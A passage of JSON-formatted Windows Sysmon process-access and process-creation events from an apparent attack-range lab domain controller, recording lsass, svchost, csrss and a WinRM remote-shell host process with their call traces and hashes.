05:52:46.015","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5349,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.015\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.015","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5350,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.032\r\nProcessGuid: {A837DB8D-032E-5F25-0000-0010FC520A00}\r\nProcessId: 3396\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.032","ProcessGuid":"{A837DB8D-032E-5F25-0000-0010FC520A00}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5351,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5352,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5353,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5354,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5355,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5356,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
